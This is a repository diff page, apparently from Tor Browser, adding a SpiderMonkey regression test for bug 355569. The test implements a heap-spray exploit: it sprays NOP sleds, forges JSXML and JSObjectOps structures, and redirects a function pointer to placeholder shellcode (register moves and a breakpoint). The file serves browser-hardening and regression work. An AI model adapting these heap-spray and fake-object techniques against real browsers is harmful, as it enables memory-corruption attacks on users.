The Tor Browser / file comparison
comparison: js/src/tests/js1_8_5/regress/regress-355569.js
js/src/tests/js1_8_5/regress/regress-355569.js
- branch
- TOR_BUG_3246
- changeset 7
- 129ffea94266
equal
deleted
inserted
replaced
| -1:000000000000 | 0:6f92a2dc58b3 |
|---|---|
| 1 /* -*- Mode: java; tab-width:8; indent-tabs-mode: nil; c-basic-offset: 4 -*- */ | |
| 2 | |
| 3 /* This Source Code Form is subject to the terms of the Mozilla Public | |
| 4 * License, v. 2.0. If a copy of the MPL was not distributed with this | |
| 5 * file, You can obtain one at http://mozilla.org/MPL/2.0/. */ | |
| 6 | |
| 7 var bug = 355569; | |
| 8 var actual = ''; | |
| 9 var expect = ''; | |
| 10 | |
| 11 printBugNumber (bug); | |
| 12 printStatus (summary); | |
| 13 | |
| 14 var targetAddress = 0x12030010; | |
| 15 var sprayParams = { | |
| 16 chunkSize: 16 * 1024 * 1024, | |
| 17 chunkCount: 16, | |
| 18 chunkMarker: 0xdeadface, | |
| 19 chunkAlign: 0x1000, | |
| 20 reservedSize: 1024 | |
| 21 }; | |
| 22 | |
| 23 function makeExploitCode() { | |
| 24 /* mov eax, 0xdeadfeed; mov ebx, eax; mov ecx, eax; mov edx, eax; int3 */ | |
| 25 return "\uEDB8\uADFE\u89DE\u89C3\u89C1\uCCC2"; | |
| 26 } | |
| 27 | |
| 28 /*==========================================================================*/ | |
| 29 /*==========================================================================*/ | |
| 30 | |
| 31 function packData(template, A) { | |
| 32 var n = 0, result = "", vl; | |
| 33 for(var i = 0; i < template.length; i++) { | |
| 34 var ch = template.charAt(i); | |
| 35 if(ch == "s" || ch == "S") { | |
| 36 vl = A[n++] >>> 0; result += String.fromCharCode(vl & 0xffff); | |
| 37 } else if(ch == "l" || ch == "L") { // XXX endian | |
| 38 vl = A[n++] >>> 0; result += String.fromCharCode(vl & 0xffff, vl >> 16); | |
| 39 } else if(ch == "=") { | |
| 40 result += String(A[n++]); | |
| 41 } | |
| 42 } | |
| 43 return result; | |
| 44 } | |
| 45 function buildStructure(worker, address) { | |
| 46 var offs = {}, result = "", context = { | |
| 47 append: function(k, v) { offs[k] = result.length * 2; result += v; }, | |
| 48 address: function(k) { return address + ((k && offs[k]) || 0); } | |
| 49 }; worker(context); result = ""; worker(context); return result; | |
| 50 } | |
| 51 function repeatToLength(s, L) { | |
| 52 if(L <= s.length) { return s.substring(0, L); } | |
| 53 while(s.length <= L/2) { s += s; } | |
| 54 return s + s.substring(0, L - s.length); | |
| 55 } | |
| 56 function sprayData(data, params, rooter) { | |
| 57 var marker = packData("L", [ params.chunkMarker ]); | |
| 58 data += repeatToLength("\u9090", params.chunkAlign / 2 - data.length); | |
| 59 data = repeatToLength(data, (params.chunkSize - params.reservedSize) / 2); | |
| 60 for(var i = 0; i < params.chunkCount; i++) { | |
| 61 rooter[i] = marker + data + i; | |
| 62 } | |
| 63 } | |
| 64 | |
| 65 function T_JSObject(map, slots) | |
| 66 { return packData("LL", arguments); } | |
| 67 function T_JSObjectMap(nrefs, ops, nslots, freeslot) | |
| 68 { return packData("LLLL", arguments); } | |
| 69 function T_JSObjectOps( | |
| 70 newObjectMap, destroyObjectMap, lookupProperty, defineProperty, | |
| 71 getProperty, setProperty, getAttributes, setAttributes, | |
| 72 deleteProperty, defaultValue, enumerate, checkAccess, | |
| 73 thisObject, dropProperty, call, construct, | |
| 74 xdrObject, hasInstance, setProto, setParent, | |
| 75 mark, clear, getRequiredSlot, setRequiredSlot | |
| 76 ) { return packData("LLLLLLLL LLLLLLLL LLLLLLLL", arguments); } | |
| 77 | |
| 78 function T_JSXML_LIST( | |
| 79 object, domnode, parent, name, xml_class, xml_flags, | |
| 80 kids_length, kids_capacity, kids_vector, kids_cursors, | |
| 81 xml_target, xml_targetprop | |
| 82 ) { return packData("LLLLSS LLLL LL", arguments); } | |
| 83 function T_JSXML_ELEMENT( | |
| 84 object, domnode, parent, name, xml_class, xml_flags, | |
| 85 kids_length, kids_capacity, kids_vector, kids_cursors, | |
| 86 nses_length, nses_capacity, nses_vector, nses_cursors, | |
| 87 atrs_length, atrs_capacity, atrs_vector, atrs_cursors | |
| 88 ) { return packData("LLLLSS LLLL LLLL LLLL", arguments); } | |
| 89 | |
| 90 /*==========================================================================*/ | |
| 91 /*==========================================================================*/ | |
| 92 | |
| 93 function makeExploitData(address) { | |
| 94 return buildStructure(function(ctx) { | |
| 95 ctx.append("xml-list", | |
| 96 T_JSXML_LIST(0, 0, 0, 0, 0, 0, 1, 0, ctx.address("xml-kids-vector"), 0, 0, 0)); | |
| 97 ctx.append("xml-kids-vector", | |
| 98 packData("L", [ ctx.address("xml-element") ])); | |
| 99 ctx.append("xml-element", | |
| 100 T_JSXML_ELEMENT(ctx.address("object"), 0, 0, 0, 1, 0, 0, 0, 0, 0, /*c*/ 0, 0, 0, 0, /*d*/ 0, 0, 0, 0)); | |
| 101 ctx.append("object", | |
| 102 T_JSObject(ctx.address("object-map"), 0)); | |
| 103 ctx.append("object-map", | |
| 104 T_JSObjectMap(0, ctx.address("object-ops"), 0, 0)); | |
| 105 ctx.append("object-ops", | |
| 106 T_JSObjectOps(0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, ctx.address("exploit-code"), 0)); | |
| 107 ctx.append("exploit-code", | |
| 108 makeExploitCode(ctx)); | |
| 109 }, address); | |
| 110 } | |
| 111 | |
| 112 function exploit() { | |
| 113 sprayData(makeExploitData(targetAddress), sprayParams, this.rooter = {}); | |
| 114 var numobj = new Number(targetAddress >> 1); | |
| 115 printStatus("probably not exploitable"); | |
| 116 } | |
| 117 | |
| 118 try | |
| 119 { | |
| 120 exploit(); | |
| 121 } | |
| 122 catch(ex) | |
| 123 { | |
| 124 } | |
| 125 | |
| 126 reportCompare(expect, actual); | |
| 127 |
